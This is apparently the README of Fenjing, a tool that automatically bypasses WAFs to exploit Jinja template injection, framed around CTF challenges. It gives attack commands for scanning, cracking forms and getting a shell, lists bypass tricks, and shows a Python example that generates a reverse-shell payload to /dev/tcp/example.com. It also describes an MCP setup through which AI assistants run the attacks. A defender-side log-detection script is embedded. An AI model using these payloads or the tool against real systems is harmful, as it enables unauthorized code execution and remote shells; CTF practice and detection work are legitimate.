Bypass the WAF without knowing WAF
Fenjing is a fully automated script for bypassing WAFs in Jinja SSTI challenges in CTF competitions. It can automatically attack a given website or API endpoint, saving the time spent manually testing endpoints and fuzzing the challenge's WAF.
Demo
Main features
- Integrates most of the SSTI WAF bypass techniques used in CTFs
- Fully automatic brute-forcing of API parameters, followed by the attack
- Fully automatic analysis of the site's WAF and generation of a matching payload
- Supports attacking the corresponding HTML form or HTTP path
- Supports submitting the payload in a GET parameter, which effectively reduces payload length
- Automatically detects keyword replacement and bypasses it
- ......
Installation
Choose one of the following methods
Install and run with pipx (recommended)
#pip install pipx
# Then use pipx to automatically create an isolated virtual environment and install into it
pipx install fenjing
fenjing webui
# fenjing scan --url 'http://xxxx:xxx'
Install and run with pip
fenjing webui
# fenjing scan --url 'http://xxxx:xxx'
Download and run the docker image
Usage
webui
You can start the webui directly with python -m fenjing webui, then specify the parameters and attack automatically
Fill in the parameters on the left and click Start Analysis, then enter commands on the right
scan
In a terminal you can use the scan function to guess the parameters of a page and attack automatically:
python -m fenjing scan --url 'http://xxxx:xxx/yyy'
crack
You can also use the crack function to attack with manually specified parameters:
python -m fenjing crack --url 'http://xxxx:xxx/yyy' --detect-mode fast --inputs aaa,bbb --method GET
Here the two parameters aaa and bbb are supplied for the attack, and --detect-mode fast is used to speed it up
crack-request
You can also write an HTTP request into a text file (for example req.txt) and then attack
The contents of the text file are as follows:
Host: 127.0.0.1:5000
Connection: close
The command is as follows:
python -m fenjing crack-request -f req.txt --host '127.0.0.1' --port 5000
crack-keywords
If you already have the server-side source code app.py, the lists in the code can be extracted automatically as a blacklist and the corresponding payload generated
The command is as follows:
python -m fenjing crack-keywords -k app.py -c 'ls /'
Other
APIs that accept JSON are also supported, as is generating a payload from given keywords; see examples.md
Detailed usage and troubleshooting
See examples.md and the --help option
Technical details
The project structure is as follows:
For how payloads are generated, see howitworks.md
The supported bypass rules are as follows
Key character bypass:
- ' and "
- _
- [
- The vast majority of sensitive keywords
- Any Arabic digit
- +
- -
- *
- ~
- {{
- %
- ...
Natural number bypass:
Supports bypassing 0-9 together with bypassing addition, subtraction, multiplication and division. The supported methods are:
- Hexadecimal
- a*b+c
- (39,39,20)|sum
- (x,x,x)|length
- Full-width characters in unicode, etc.
'%c' bypass:
Supports bypassing quotes, g, lipsum, urlencode, etc.
Underscore bypass:
Supports (lipsum|escape|batch(22)|list|first|last), etc.
- The number 22 in it supports the number bypass above
Arbitrary strings:
Supports bypassing quotes, any string concatenation operator, underscores and any keyword
The following forms are supported
- 'str'
- "str"
- "\x61\x61\x61"
- dict(__class__=x)|join
  - The underscores in it support bypass
- '%c'*3%(97,97, 97)
  - The '%c' in it also supports the '%c' bypass above
  - All the numbers in it support the number bypass above
- Splitting the string into short segments and generating each separately
- ...
Attributes:
- ['aaa']
- .aaa
- |attr('aaa')
Item
- ['aaa']
- .aaa
- .__getitem__('aaa')
Other technical details
- The script generates some strings in advance and sets them up front with {%set %}
- The script sets some variables at the front of the payload for use by the expressions in the later part of the payload.
- The script generates shorter expressions while remaining fully automatic.
- The script carefully checks the precedence of each expression and avoids generating redundant parentheses where possible.
Detailed usage
Using it as a command-line script
What each function does:
- webui: web UI
  - As the name suggests, a web UI
  - Default port 11451
- scan: scan an entire website
  - Extracts all forms from the site based on its form elements and attacks them
  - Brute-forces parameters for the given URL, and extracts other URLs to scan
  - After a successful scan, provides a simulated terminal or executes the given command
  - Example:
    python -m fenjing scan --url 'http://xxx/'
- crack: attack one specific form
  - Requires the form's url, action (GET or POST) and all fields (for example 'name')
  - After a successful attack, also provides a simulated terminal or executes the given command
  - Example:
    python -m fenjing crack --url 'http://xxx/' --method GET --inputs name
- crack-path: attack one specific path
  - Attacks a vulnerability present under a path (such as http://xxx.xxx/hello/)
  - The parameters are largely the same as for crack, but only the corresponding path needs to be given
  - Example:
    python -m fenjing crack-path --url 'http://xxx/hello/'
- crack-request: read a request file and attack
  - Reads the request in the file, replaces PAYLOAD in it with the actual payload, then submits it
  - By default the request is urlencoded according to the HTTP format; this can be turned off with --urlencode-payload 0
- crack-json: attack a specified JSON API
  - When an API's body format is JSON, attacks a given key in that JSON
  - Example:
    python -m fenjing crack-json --url 'http://127.0.0.1:5000/crackjson' --json-data '{"name": "admin", "age": 24, "msg": ""}' --key msg
- crack-keywords: read all keywords from a file and attack
  - Reads all keywords from a .txt, .py or .json file and generates the corresponding payload for the given shell command
  - Example:
    python -m fenjing crack-keywords -k waf.json -o payload.jinja2 --command 'ls /'
Some special options:
- --eval-args-payload: submit the payload in the GET parameter x
- --detect-mode: detection mode, either accurate or fast
- --environment: specifies the template rendering environment; by default the template is assumed to be rendered in flask's render_template_string
- --tamper-cmd: encode the payload before it is sent
  - For example:
    - --tamper-cmd 'rev': reverse the payload before sending it
    - --tamper-cmd 'base64': base64-encode the payload before sending it
    - --tamper-cmd 'base64 | rev': base64-encode the payload, then reverse it, before sending it
- For a detailed explanation see examples.md
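The scan, crack and crack-path functions above submit template text in GET parameters or in the URL path, urlencoded by default, so those requests appear in web access logs. The following is an added defender-side example, not part of Fenjing: it percent-decodes each request target (including double encoding) and reports clients that repeatedly send Jinja2 delimiters. The combined log format, the function names, the threshold of 3 and the sample lines are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Openers of Jinja2's default expression, statement and comment delimiters.
DELIMS = re.compile(r"\{\{|\{%|\{#")
# Client address and request target from a combined-format access log line.
LINE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def decoding_stages(value, max_rounds=3):
    """Return the value after 0..max_rounds rounds of percent-decoding."""
    stages = [value]
    for _ in range(max_rounds):
        decoded = unquote_plus(stages[-1])
        if decoded == stages[-1]:
            break
        stages.append(decoded)
    return stages

def find_template_probes(log_lines, threshold=3):
    """Map client IP -> decoded targets containing Jinja2 delimiters,
    keeping only clients with at least `threshold` such requests."""
    hits = defaultdict(list)
    for line in log_lines:
        m = LINE.match(line)
        if not m:
            continue
        # Check every decoding stage so a later round cannot hide a match.
        for stage in decoding_stages(m.group("target")):
            if DELIMS.search(stage):
                hits[m.group("ip")].append(stage)
                break
    return {ip: t for ip, t in hits.items() if len(t) >= threshold}

# Constructed sample lines (documentation addresses, harmless template text).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /?name=%7B%7B1%7D%7D HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /?x=%257B%2525set%20a%3D1%2525%257D HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /hello/%7B%7B1%7D%7D HTTP/1.1" 404 0',
    '203.0.113.9 - - [01/Jan/2025:10:00:03 +0000] "GET /?q=%7B%7Btitle%7D%7D HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2025:10:00:04 +0000] "GET /?name=alice HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for ip, targets in find_template_probes(SAMPLE_LOG).items():
        print(ip, len(targets), targets)
```

Payloads sent in POST bodies, or transformed with --tamper-cmd before sending, do not appear in this form in an access log and need inspection at the application or proxy layer instead.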
MCP server support
Fenjing can be offered to AI assistants as an external service through the Model Context Protocol (MCP).
Configuration
Add the following to the MCP client's configuration file (for example OpenCode's opencode.jsonc):
{
  "mcp": {
    "fenjing": {
      "type": "local",
      "command": ["fenjing", "mcp"],
      "enabled": true
    }
  }
}
Once configured, the AI assistant can perform SSTI vulnerability detection and attacks through Fenjing.
Using it as a Python library
See example.py
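from fenjing import exec_cmd_payload, config_payload
import logging

logging.basicConfig(level = logging.INFO)

def waf(s: str):
    # Returns True when the string contains none of the blacklisted tokens,
    # i.e. when the payload would pass the WAF.
    blacklist = [
        "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum",
        "[", '"', "'", "_", ".", "+", "~", "{{",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
        "0","1","2","3","4","5","6","7","8","9"
    ]
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    # Generate a payload that runs the given shell command and passes waf()
    shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"")
    # Generate a payload that reads the config and passes waf()
    config_payload = config_payload(waf)
    print(f"{shell_payload=}")
    print(f"{config_payload=}")
Other usage examples can be found here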
Donations
| Date | Amount | Platform | Note ID | Note |
|---|---|---|---|---|
| 20250407 | ¥20 | WeChat | | |
| 20250703 | ¥18.88 | WeChat | Keep it up! | |
| 20251110 | ¥50 | WeChat | | |